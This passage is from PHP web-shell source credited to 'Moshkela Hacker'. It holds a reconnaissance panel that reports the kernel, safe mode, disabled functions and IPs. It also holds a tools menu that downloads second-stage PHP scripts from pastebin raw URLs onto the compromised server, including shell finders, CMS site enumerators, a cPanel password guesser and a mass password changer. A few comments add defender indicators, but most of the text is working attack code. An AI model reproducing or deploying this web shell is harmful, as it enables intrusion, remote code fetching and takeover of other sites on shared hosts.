  571. <h1> Coded By Moshkela Hacker<br>
  572.  
  573. </h1>
  574. <h3>tnx : Mostafa Moshkela </h3>
  575.  
  576. ';
  577. }
  578. ////Server Info
       // "Server Info" tool: read-only reconnaissance. Reports php_uname(), the
       // safe_mode and disable_functions settings, the server address and the
       // client address.
  579. else if ($_REQUEST['tool'] == "Server Info") {
  580. echo"<h3>Server Info</h3>";
  581. $safe = ini_get("safe_mode");
  582. if($safe == 1){
  583. $safe_mode = "<font color=red>ON</font>";
  584. }else{
  585. $safe_mode = "<font color=#FF00FF>OFF</font>";
  586. }
  587. $dis = ini_get("disable_functions");
  588. if($dis == ""){
  589. $disable = "<font color=#FF00FF>None</font>";
  590. }else{
  591. $disable = "<font color=red>$dis</font>";
  592. }
  593. $uname = php_uname();
  594. $server = $_SERVER['SERVER_ADDR'];
  595. $me = $_SERVER['REMOTE_ADDR'];
  596. echo "
  597. <div>
  598. <span>
  599. Uname-a : $uname<br>
  600. Safe Mode : $safe_mode<br>
  601. Disable Functions : $disable
  602. </span>
  603. <span class=info2>
  604. <br>Server IP : $server </br>
  605. <br>Your IP : $me </br>
  606. </span>
  607. </div>
  608. ";
  609.  
  610. }else if($_REQUEST['tool'] == "Other tools"){
       // "Other tools" menu: every case downloads a second-stage PHP file from a
       // pastebin.com raw URL over plain HTTP (file_get_contents on a URL, which
       // requires allow_url_fopen) and writes it next to this script.
       // Defender view: outbound requests from the web server to pastebin.com, and
       // newly created Findshell.php, jomla.php, wordpress.php, ip.php,
       // 1337w0rm.php, Adminer.php or Masspass.php, are indicators. The content of
       // those downloads is not shown on this page. Blocking outbound HTTP from
       // the web tier, or disabling allow_url_fopen, stops the fetch.
  611. echo"<h3>Other tools</h3>";
  612. echo'<form method="post">
  613. <b><span style=\"color: rgb(51, 204, 0);\"> Tools : <b></span><select name="tools" >
  614. <option>Moshkela Hacker Tools</option>
  615. <option>Find Shell</option>
  616. <option>Get Jomla Sites</option>
  617. <option>Get WordPress Sites</option>
  618. <option>Get All Sites Server</option>
  619. <option>1337w0rm</option>
  620. <option>Adminer</option>
  621. <option>Mass Password</option>
  622. </select>
  623. <input type="submit" name="get" value="Get" />
  624. </form>';
  625. /////////////////////////////////////////////////////////////////
  626. if($_POST['get']){
  627.  
  628. switch($_POST['tools']){
  629.  
  630. ////////////////////////////////////////////// search for shells
  631. case "Find Shell":
  632. if(file_put_contents('Findshell.php',file_get_contents('http://pastebin.com/raw/AR8MzfZV'))){
  633. echo "<center><font color=red size=8>Findshell.php Done !</font></center>";
  634. };
  635. break;
  636. ////////////////////////////////////////////// fetch the sites that have the Joomla script installed
  637. case "Get Jomla Sites":
  638. if(file_put_contents('jomla.php',file_get_contents('http://pastebin.com/raw/9BQ62rZF'))){
  639. echo "<center><font color=red size=8>jomla.php Done !</font></center>";
  640. }
  641. break;
  642. ////////////////////////////////////////////// fetch the sites that have the WordPress script installed
  643. case "Get WordPress Sites":
  644. if(file_put_contents('wordpress.php',file_get_contents('http://pastebin.com/raw/504iswx3'))){
  645. echo "<center><font color=red size=8>wordpress.php Done !</font></center>";
  646. }
  647. break;
  648. ////////////////////////////////////////////// fetch all sites on the server
  649. case "Get All Sites Server":
  650. if(file_put_contents('ip.php',file_get_contents('http://pastebin.com/raw/c70btt4r'))){
  651. echo "<center><font color=red size=8>ip.php Done !</font></center>";
  652. }
  653. break;
  654. ////////////////////////////////////////////// password guessing against cPanel
  655. case "1337w0rm":
  656. if(file_put_contents('1337w0rm.php',file_get_contents('http://pastebin.com/raw/sqK6hVJd'))){
  657. echo "<center><font color=red size=8>1337w0rm.php Done !</font></center>";
  658. }
  659. break;
  660. ////////////////////////////////////////////// connect to the database
  661. case "Adminer":
  662. if(file_put_contents('Adminer.php',file_get_contents('http://pastebin.com/raw/BZHXtZqu'))){
  663. echo "<center><font color=red size=8>Adminer.php Done !</font></center>";
  664. }
  665. break;
  666. ////////////////////////////////////////////// change all sites on the server
  667. case "Mass Password":
  668. if(file_put_contents('Masspass.php',file_get_contents('http://pastebin.com/raw/eLv6MUpD'))){
  669. echo "<center><font color=red size=8>Masspass.php Done !</font></center>";
  670. }
  671. break;
  672. //////////////////////////////////////////////
  673. } // switch end
  674. }// end if
  675. }
  676. ?>
  677. <?php exit(); ?>